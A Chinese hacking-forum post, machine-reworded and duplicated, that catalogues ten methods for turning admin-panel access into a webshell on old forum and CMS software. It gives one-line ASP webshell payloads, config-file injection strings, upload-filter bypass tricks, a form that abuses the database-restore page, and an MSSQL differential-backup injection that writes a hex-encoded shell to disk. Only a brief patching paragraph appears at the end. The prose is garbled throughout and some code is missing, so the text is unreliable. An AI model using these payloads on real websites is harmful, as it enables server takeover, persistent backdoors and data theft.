网站后台拿shell方法总结

今日带给大伙的都是些手艺上的总结，有些人老问经验怎么来的，这个即是经验，盼愿大伙都能成为脚本妙手.
动网上传漏洞，信任大伙拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全国，现在这种漏洞已经根柢斗劲难见到了，不扫除一些小网站模拟仍是存在此漏洞。在拿站历程中，我们凡是费了九牛两虎之力拿到办理员帐号和密码，并顺遂进入了后台，当然此时与拿到网站webshell还有一步之遥，但仍是有良多新手因想不出合适的体例而被拒之门外。是以，我们把常用的从后台获得webshell的体例进行了总结和归纳，概略情形有以下十细腻面。
详尽：若何进入后台，不是本文谈判规模，其具体体例就不说了，靠大伙去自己发挥。此文参考了前人的多方面的资料和信息，在此一并浮现感谢。
一、直接上传获得webshell
二、添加改削上传典型
三、操纵后台办理功效写入webshell
四、操纵后台办理向设置装备摆设文件写webshell
五、操纵后台数据库备份及恢复获得webshell
六、操纵数据库压缩功效
七、asp+mssql系统
八、php+mysql系统
九、phpwind论坛从后台到webshell的三种体例
一、直接上传获得webshell
这种对php和jsp的一些轨范斗劲常见，MolyX BOARD即是其中一例，直接在神色图标办理上传.php典型，当然没有提醒，实在已经乐成了，上传的文件url应该是http://admin8.us/images/smiles/下，前一阵子的联众游戏站和163的jsp系统漏洞就可以直接上传jsp文件。文件名是原本的文件名，bo-博客后台可以可以直接上传.php文件，上传的文件路径有提醒。以及一年前很是流行的upfile.asp漏洞(动网5.0和6.0、早期的良多整站系统)，因过滤上传文件不严，导致用户可以直接上传webshell到网站尽情可写目录中，从而拿到网站的办理员节制权限。
二、添加改削上传典型
现在良多的脚本轨范上传模块不是只答应上传正当文件典型，而年夜年夜都的系统是答应添加上传典型，bbsxp后台可以添加asa　asP典型，ewebeditor的后台也可添加asa典型,经由过程改削后我们可以直接上传asa后缀的webshell了,还有一种情形是过滤了.asp，可以添加.aspasp的文件典型来上传获得webshell。php系统的后台，我们可以添加.php.g1f的上传典型，这是php的一个特征,末尾的哪个只要不是已知的文件典型即可，php会将php.g1f作为.php来正常运行,从而也可乐成拿到shell。LeadBbs3.14后台获得webshell体例是：在上传典型中增添asp
，详尽，asp后背是有个空格的，然后在前台上传ASP马，当然也要在后背加个空格！
三、操纵后台控制面板写入webshell
上传漏洞根柢上补的也差不多了,所以我们进入后台后还可以经由过程改削相关文件来写入webshell。斗劲的典型的有dvbbs6.0，还有leadbbs2.88等，直接在后台改削设置装备摆设文件，写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一体例是：添加一个新的友谊链接，在网站名称处写上冰狐最小马即可,最小马前后要肆意输入一些字符，http:\\网站\inc\IncHtm\BoardLink.asp即是我们想要的shell。
四、操纵后台办理向设置装备摆设文件写webshell
操纵”"”":”"//”等标识表记标帜结构最小马写入轨范的设置装备摆设文件，joekoe论坛，某某同学录，沸腾展望动静系统，COCOON Counter统计轨范等等，还有良多php轨范都可以，COCOON Counter统计轨范举例，在办理邮箱处添上cnhacker@admin8.us”:eval request(chr (35))//, 在配制文件中即是webmail=”cnhacker@admin8.us\”:eval request(chr(35))//”，还有一种体例即是写上
cnhacker@admin8.us”%＞＜%eval request(chr(35))%＞＜%’，这样就会形成前后对应，最小马也就运行了。＜%eval request(chr(35))%＞可以用lake2的eval发送端以及最新的2006 客户端来连，需要说明的是数据库插马时刻要选前者。再如动易2005，到文章中心办理-顶部菜单设置-菜单别的特效，插入一句话马”%＞＜%execute request(“l”)%＞＜%’，保 存顶部栏目菜单参数设置乐成后，我们就获得马地址http://网站/admin/rootclass_menu_config.asp。
五、操纵后台数据库备份及恢复获得webshell
重若是操纵后台对access数据库的“备份数据库”或“恢复数据库”功效，“备份的数据库路径”等变量没有过滤导致可以把尽情文件后缀改 为asp，从而获得webshell，msssql版的轨范就直接应用了access版的代码，导致sql版仍是可以操纵。还可以备份网站asp文件为其他后缀 如.txt文件，从而可以检察并获得网页源代码，并获得更多的轨范信息增添获得webshell的机缘。在现实运用中凡是会碰着没有上传功效的时 候，可是有asp系统在运行，操纵此体例来检察源代码来获得其数据库的位置，为数据库插马来缔造机缘，动网论坛就有一个ip地址的数据库，在后台的ip办理中可以插入最小马然后备份成.asp文件即可。在谈谈冲破上传检测的体例，良多asp轨范期近使改了后缀名后也会提醒文件犯警，经由过程在.asp文件头加上gif89a改削后缀为gif来骗过asp轨范检测到达上传的方针，还有一种即是用记事本打开图片文件，肆意粘贴一部门复制到asp木马文件头，改削gif后缀后上传也可以冲破检测，然后备份为.asp文件，乐成获得webshell。
六、操纵数据库压缩功效
可以将数据的防下载失踪效从而使插入数据库的最小马乐成运行，斗劲典型的即是loveyuki的L-BLOG，在友谊添加的url出写上＜%eval request (chr(35))%＞, 提交后，在数据库操纵中压缩数据库，可以乐成压缩出.asp文件，用海洋的最小马的eval客户端连就获得一个webshell。
七、asp+mssql系统
这里需要提一点动网mssql版，可是可以直接当地提交来备份的。首先在发帖那上传一个写有asp代码的假图片，然后记住其上传路径。写一个当地提交的表单，代码如下：
＜form action=http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method=”post”＞
＜p＞已上传文件的位置：＜input name=”Dbpath” type=”text” size=”80″＞＜/p＞
＜p＞要复制到的位置：＜input name=”backpath” type=”text” size=”80″＞＜/p＞
＜p＞＜input type=”submit” value=”提交”＞＜/p＞ ＜/form＞
另存为.htm当地实施。把假图片上传路径填在“已上传文件的位置”何处，想要备份的WebShell的相对路径填写在“要复制到的位置”何处，提交就获得我们可爱的WebShell了，恢复代码和此类似，改削相关地方就可以了。没有碰着事后台实施mssql饬令斗劲强大的asp轨范后台，动网的数据库还原和备份是个摆设，不能实施sql饬令备份webshell，只能实施一些大略的盘问饬令。可以操纵mssql注入差别备份webshell，一样平常后台是浮现了绝对路径，只要有了注入点根柢上就可以差别备份乐成。下面是差别备份的主要语句代码，操纵动网7.0的注入漏洞可以用差别备份一个webshell，可以用操纵上面提到的体例，将conn.asp文件备份成.txt文件而获得库名。
差别备份的主要代码：
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0×626273 backup database @a to disk=@s–
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])–
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)–
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT–
这段代码中，0×626273是要备份的库名bbs的十六进制，可所以其他名字好比bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是＜%execute request(“l”)%＞的十六进制，是lp最小马；0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也即是你要备份的webshell路径。当然也可以用斗劲常见备份体例来获得webshell，独一的不够即是备份后的文件过年夜，若是备份数据库中有防下载的的数据表，概略有错误的asp代码，备份出来的webshell就不会乐成运行，操纵差别备份是乐成率斗劲高的体例，而且极年夜的淘汰备份文件的巨细。
八、php+mysql系统
后台需要有mysql数据盘问功效,我们就可以操纵它实施SELECT … INTO OUTFILE盘问输出php文件，因为全数的数据是存放在mysql里的，所以我们可以经由过程正常本事把我们的webshell代码插入mysql在操纵SELECT … INTO OUTFILE语句导出shell。
就可以暴出路径，php情形中斗劲轻易暴出绝对路径：）。提一点的是碰着是mysql在win系统下路径应该这样写。下面的体例是斗劲常用的一个导出webshell的体例，也可以写个vbs添加系统办理员的脚本导出到启动文件夹，系统重起后就会添加一个办理员帐号
就会在up目录下生成文件名为saiy.php内容为的最小php木马， 末尾用lanker的客户端来毗连。现实运用中要考虑到文件夹是否有写权限。概略输入这样的代码 将会在当前目录生成一个a.php的最小马。
九、phpwind论坛从后台到webshell的三种体例
体例1 模板法
进入后台， 气概气派气概气派模版设置 ，在肆意一行写代码，记着，这代码必需顶着左边行写，代码前面不成以有任何字符。
方始2 脏话过滤法
体例3 用户品级办理
以上三种体例获得webshellr的密码是a,为lanker的一句话后门办事端。
十、也可以操纵网站访谒计数系统记实来获得webshell
解决方法
因为本文涉及的代码版本良多，所以不概略供给一个完竣的办理方案。有本事者可以针对本文提到的漏洞文件进行适当修补，若漏洞文件不影响系统操纵也可删除此文件。大伙若是不会修补，可以到相关官方网站下载最新补丁进行修复更新。同时也请大伙能时辰关注各年夜平安收集揭晓的最新通告，若自己发现相关漏洞也可实时看护官方网站。
后记
实在，从后台获得webshell的本事应该还有良多的，关头是要看大伙怎么无邪运用、举一反三，盼愿本文的体例能起到抛砖引玉的浸染。 列位加油吧，让我们将办事器节制到底！
正进修后台拿Shell的体例，今日恰巧在网上瞥见获得后台拿shell的汇总全集，很不错的总结，分享了！版主给个精髓吧！??今日带给大伙的都是些手艺上的总结，有些人老问经验怎么来的，这个即是经验，盼愿大伙都能成为脚本妙手.??动网上传漏洞，信任大伙拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全国，现在这种漏洞已经根柢斗劲难见到了，不扫除一些小网站模拟仍是存在此漏洞。在拿站历程中，我们凡是费了九牛两虎之力拿到办理员帐号和密码，并顺遂进入了后台，当然此时与拿到网站webshell还有一步之遥，但仍是有良多新手因想不出合适的体例而被拒之门外。是以，我们把常用的从后台获得webshell的体例进行了总结和归纳，概略情形有以下十细腻面。

详尽：若何进入后台，不是本文谈判规模，其具体体例就不说了，靠大伙去自己发挥。此文参考了前人的多方面的资料和信息，在此一并浮现感谢。

一、直接上传获得webshell?二、添加改削上传典型?三、操纵后台办理功效写入webshell四、操纵后台办理向设置装备摆设文件写webshell五、操纵后台数据库备份及恢复获得webshell六、操纵数据库压缩功效七、asp+mssql系统八、php+mysql系统?九、phpwind论坛从后台到webshell的三种体例

一、直接上传获得webshell

这种对php和jsp的一些轨范斗劲常见，MolyX BOARD即是其中一例，直接在神色图标办理上传.php典型，当然没有提醒，实在已经乐成了，上传的文件url应该是http://admin8.us/images/smiles/下，前一阵子的联众游戏站和163的jsp系统漏洞就可以直接上传jsp文件。文件名是原本的文件名，bo-博客后台可以可以直接上传.php文件，上传的文件路径有提醒。以及一年前很是流行的upfile.asp漏洞(动网5.0和6.0、早期的良多整站系统)，因过滤上传文件不严，导致用户可以直接上传webshell到网站尽情可写目录中，从而拿到网站的办理员节制权限。

二、添加改削上传典型

现在良多的脚本轨范上传模块不是只答应上传正当文件典型，而年夜年夜都的系统是答应添加上传典型，bbsxp后台可以添加asa　asP典型，ewebeditor的后台也可添加asa典型,经由过程改削后我们可以直接上传asa后缀的webshell了,还有一种情形是过滤了.asp，可以添加.aspasp的文件典型来上传获得webshell。php系统的后台，我们可以添加.php.g1f的上传典型，这是php的一个特征,末尾的哪个只要不是已知的文件典型即可，php会将php.g1f作为.php来正常运行,从而也可乐成拿到shell。LeadBbs3.14后台获得webshell体例是：在上传典型中增添asp
，详尽，asp后背是有个空格的，然后在前台上传ASP马，当然也要在后背加个空格！

三、操纵后台控制面板写入webshell

上传漏洞根柢上补的也差不多了,所以我们进入后台后还可以经由过程改削相关文件来写入webshell。斗劲的典型的有dvbbs6.0，还有leadbbs2.88等，直接在后台改削设置装备摆设文件，写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一体例是：添加一个新的友谊链接，在网站名称处写上冰狐最小马即可,最小马前后要肆意输入一些字符，http:\\网站\inc\IncHtm\BoardLink.asp即是我们想要的shell。

四、操纵后台办理向设置装备摆设文件写webshell

操纵”"”":”"//”等标识表记标帜结构最小马写入轨范的设置装备摆设文件，joekoe论坛，某某同学录，沸腾展望动静系统，COCOON Counter统计轨范等等，还有良多php轨范都可以，COCOON Counter统计轨范举例，在办理邮箱处添上cnhacker@admin8.us”:eval request(chr (35))//, 在配制文件中即是webmail=”cnhacker@admin8.us\”:eval request(chr(35))//”，还有一种体例即是写上 cnhacker@admin8.us”%＞＜%eval
request(chr(35))%＞＜%’，这样就会形成前后对应，最小马也就运行了。＜%eval request(chr(35))%＞可以用lake2的eval发送端以及最新的2006 客户端来连，需要说明的是数据库插马时刻要选前者。再如动易2005，到文章中心办理-顶部菜单设置-菜单别的特效，插入一句话马”%＞＜%execute request(“l”)%＞＜%’，保 存顶部栏目菜单参数设置乐成后，我们就获得马地址http://网站/admin/rootclass_menu_config.asp。

五、操纵后台数据库备份及恢复获得webshell

重若是操纵后台对access数据库的“备份数据库”或“恢复数据库”功效，“备份的数据库路径”等变量没有过滤导致可以把尽情文件后缀改 为asp，从而获得webshell，msssql版的轨范就直接应用了access版的代码，导致sql版仍是可以操纵。还可以备份网站asp文件为其他后缀 如.txt文件，从而可以检察并获得网页源代码，并获得更多的轨范信息增添获得webshell的机缘。在现实运用中凡是会碰着没有上传功效的时 候，可是有asp系统在运行，操纵此体例来检察源代码来获得其数据库的位置，为数据库插马来缔造机缘，动网论坛就有一个ip地址的数据库，在后台的ip办理中可以插入最小马然后备份成.asp文件即可。在谈谈冲破上传检测的体例，良多asp轨范期近使改了后缀名后也会提醒文件犯警，经由过程在.asp文件头加上gif89a改削后缀为gif来骗过asp轨范检测到达上传的方针，还有一种即是用记事本打开图片文件，肆意粘贴一部门复制到asp木马文件头，改削gif后缀后上传也可以冲破检测，然后备份为.asp文件，乐成获得webshell。

六、操纵数据库压缩功效

可以将数据的防下载失踪效从而使插入数据库的最小马乐成运行，斗劲典型的即是loveyuki的L-BLOG，在友谊添加的url出写上＜%eval request (chr(35))%＞, 提交后，在数据库操纵中压缩数据库，可以乐成压缩出.asp文件，用海洋的最小马的eval客户端连就获得一个webshell。

七、asp+mssql系统

这里需要提一点动网mssql版，可是可以直接当地提交来备份的。首先在发帖那上传一个写有asp代码的假图片，然后记住其上传路径。写一个当地提交的表单，代码如下：

＜form action=http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method=”post”＞

＜p＞已上传文件的位置：＜input name=”Dbpath” type=”text” size=”80″＞＜/p＞

＜p＞要复制到的位置：＜input name=”backpath” type=”text” size=”80″＞＜/p＞

＜p＞＜input type=”submit” value=”提交”＞＜/p＞ ＜/form＞

另存为.htm当地实施。把假图片上传路径填在“已上传文件的位置”何处，想要备份的WebShell的相对路径填写在“要复制到的位置”何处，提交就获得我们可爱的WebShell了，恢复代码和此类似，改削相关地方就可以了。没有碰着事后台实施mssql饬令斗劲强大的asp轨范后台，动网的数据库还原和备份是个摆设，不能实施sql饬令备份webshell，只能实施一些大略的盘问饬令。可以操纵mssql注入差别备份webshell，一样平常后台是浮现了绝对路径，只要有了注入点根柢上就可以差别备份乐成。下面是差别备份的主要语句代码，操纵动网7.0的注入漏洞可以用差别备份一个webshell，可以用操纵上面提到的体例，将conn.asp文件备份成.txt文件而获得库名。

差别备份的主要代码：

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0×626273 backup database @a to disk=@s–

;Drop table [heige];create table [dbo].[heige] ([cmd] [image])–

;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)–

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT–

这段代码中，0×626273是要备份的库名bbs的十六进制，可所以其他名字好比bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是＜%execute request(“l”)%＞的十六进制，是lp最小马；0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也即是你要备份的webshell路径。当然也可以用斗劲常见备份体例来获得webshell，独一的不够即是备份后的文件过年夜，若是备份数据库中有防下载的的数据表，概略有错误的asp代码，备份出来的webshell就不会乐成运行，操纵差别备份是乐成率斗劲高的体例，而且极年夜的淘汰备份文件的巨细。

八、php+mysql系统

后台需要有mysql数据盘问功效,我们就可以操纵它实施SELECT … INTO OUTFILE盘问输出php文件，因为全数的数据是存放在mysql里的，所以我们可以经由过程正常本事把我们的webshell代码插入mysql在操纵SELECT … INTO OUTFILE语句导出shell。?　　就可以暴出路径，php情形中斗劲轻易暴出绝对路径：）。提一点的是碰着是mysql在win系统下路径应该这样写。下面的体例是斗劲常用的一个导出webshell的体例，也可以写个vbs添加系统办理员的脚本导出到启动文件夹，系统重起后就会添加一个办理员帐号?　　就会在up目录下生成文件名为saiy.php内容为的最小php木马，
末尾用lanker的客户端来毗连。现实运用中要考虑到文件夹是否有写权限。概略输入这样的代码 将会在当前目录生成一个a.php的最小马。

九、phpwind论坛从后台到webshell的三种体例

体例1 模板法

进入后台， 气概气派气概气派模版设置 ，在肆意一行写代码，记着，这代码必需顶着左边行写，代码前面不成以有任何字符。

方始2 脏话过滤法

体例3 用户品级办理

以上三种体例获得webshellr的密码是a,为lanker的一句话后门办事端。

十、也可以操纵网站访谒计数系统记实来获得webshell

解决方法

因为本文涉及的代码版本良多，所以不概略供给一个完竣的办理方案。有本事者可以针对本文提到的漏洞文件进行适当修补，若漏洞文件不影响系统操纵也可删除此文件。大伙若是不会修补，可以到相关官方网站下载最新补丁进行修复更新。同时也请大伙能时辰关注各年夜平安收集揭晓的最新通告，若自己发现相关漏洞也可实时看护官方网站。

后记

实在，从后台获得webshell的本事应该还有良多的，关头是要看大伙怎么无邪运用、举一反三，盼愿本文的体例能起到抛砖引玉的浸染。 列位加油吧，让我们将办事器节制到底！